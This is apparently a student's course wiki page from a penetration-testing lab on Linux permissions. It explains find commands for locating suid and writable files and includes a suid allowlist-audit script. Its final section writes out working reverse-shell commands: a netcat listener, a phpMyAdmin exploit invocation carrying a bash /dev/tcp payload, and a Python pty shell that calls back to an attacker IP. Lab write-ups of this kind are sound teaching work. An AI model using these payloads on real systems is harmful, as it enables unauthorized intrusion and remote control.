Week 10 Linux Permission Vulnerabilities (SEC 335) - Chromosom3/TechNotes GitHub Wiki

Permission Vulnerability Lab

Before performing the penetration test against the target, a permission vulnerability lab was assigned. This lab consisted of learning (or refreshing your knowledge of) the basics of Linux file permissions, the effective user, suid, and finding files. Specifically, we compiled a C program to find the effective user that executed said program. Following that, we worked with the file permissions and set the suid bit, file owner, and file group. After that, the lab had us look for different files with specific permissions on a remote server.

Find Command

The find command is a useful tool for this lab. The first thing we needed to find was suid programs on our local system. This was done with the command find / -perm -4000 -type f. This command finds all regular files that have the suid bit (octal 4000) set. The find command might produce some permission-denied errors. To get around that, we can use the 2>/dev/null redirect to send standard error to /dev/null. The full command would be find / -perm -4000 -type f 2>/dev/null. The leading dash matters: -perm -4000 matches any file with the suid bit set regardless of its other permission bits, while -perm 4000 matches only files whose mode is exactly 4000. The alternative to this command is find / -perm -u=s -type f 2>/dev/null. These commands were used to find a file on the test system.

The next thing we were tasked with finding was writable files on the test system. Again, we redirect permission errors to /dev/null. The command to find writable files on the test system was find / -type f -writable 2>/dev/null. However, this led to a lot of false positives in the /sys/ and /proc/ directories. To get around this, the command was changed to find / -type f -writable -not -path '/sys/*' 2>/dev/null | grep -v /proc.
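The script below is an added example, not part of the original lab or wiki. It builds a constructed directory tree to show how the three -perm forms above differ, then audits the tree for suid files that are missing from an allowlist. All function names and fixture paths are hypothetical, and it excludes a subtree with -prune rather than grep -v, which goes slightly beyond the commands above.

```bash
#!/bin/sh
# Added example: compare find's -perm forms on a constructed tree, then
# report suid files that are not on an allowlist. All names are hypothetical.

# Build a throwaway fixture with known modes and print its path.
build_fixture() {
    fx=$(mktemp -d) || return 1
    mkdir -p "$fx/bin" "$fx/proc"
    touch "$fx/bin/passwd" "$fx/bin/backup" "$fx/bin/ls" "$fx/proc/fake"
    chmod 4755 "$fx/bin/passwd"   # typical suid binary mode
    chmod 4000 "$fx/bin/backup"   # suid bit and nothing else
    chmod 0755 "$fx/bin/ls"       # no suid bit
    chmod 4755 "$fx/proc/fake"    # stands in for a pseudo-filesystem entry
    printf '%s\n' "$fx"
}

# -perm 4000: the mode must equal 4000 exactly, so 4755 files are missed.
suid_exact() { find "$1" -perm 4000 -type f 2>/dev/null | sort; }

# -perm -4000: every listed bit must be set; other bits are ignored.
suid_any() { find "$1" -perm -4000 -type f 2>/dev/null | sort; }

# -perm -u=s: symbolic spelling of the same test as -perm -4000.
suid_symbolic() { find "$1" -perm -u=s -type f 2>/dev/null | sort; }

# List suid files under $1 that are not in the allowlist file $2 (one path
# per line). $1/proc is pruned so find never descends into it.
suid_unexpected() {
    find "$1" -path "$1/proc" -prune -o -perm -4000 -type f -print 2>/dev/null \
        | sort | grep -vxF -f "$2" || true
}

# Demo run against the constructed fixture.
demo_root=$(build_fixture)
printf '%s\n' "$demo_root/bin/passwd" > "$demo_root/allow.txt"
echo "exact (-perm 4000):";  suid_exact "$demo_root"
echo "any (-perm -4000):";   suid_any "$demo_root"
echo "not on allowlist:";    suid_unexpected "$demo_root" "$demo_root/allow.txt"
rm -rf "$demo_root"
```

On a real host the allowlist would be a baseline of the distribution's expected suid binaries, so the final function prints only the files worth reviewing.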

Target: Nancurunir.shire.org

Searchsploit

Using Searchsploit allows you to view exploit code via the command line. This uses ExploitDB for the backend. Once you find an exploit you can use searchsploit to copy the code to your current directory for execution. This can be seen in the images below.

DIRB

The DIRB command was used to find folders on the system. For more information on DIRB see this wiki entry.

Reverse Shell

Reverse shells were used to establish a foothold in the system. For more information on reverse shells see this wiki entry. The specific commands used for this lab are shown below.

# On Kali
nc -lvp 5055
# On Kali (Replace 10.0.5.28 with Target IP)
python2 ./50457.py 10.0.5.28 80 /phpmyadmin/index.php gandalf shallnotpass "/bin/bash -c 'bash -i > /dev/tcp/10.0.99.36/5055 0>&1'"

# On Kali
nc -lvp 5056
# In bash reverse shell
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.99.36",5056));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'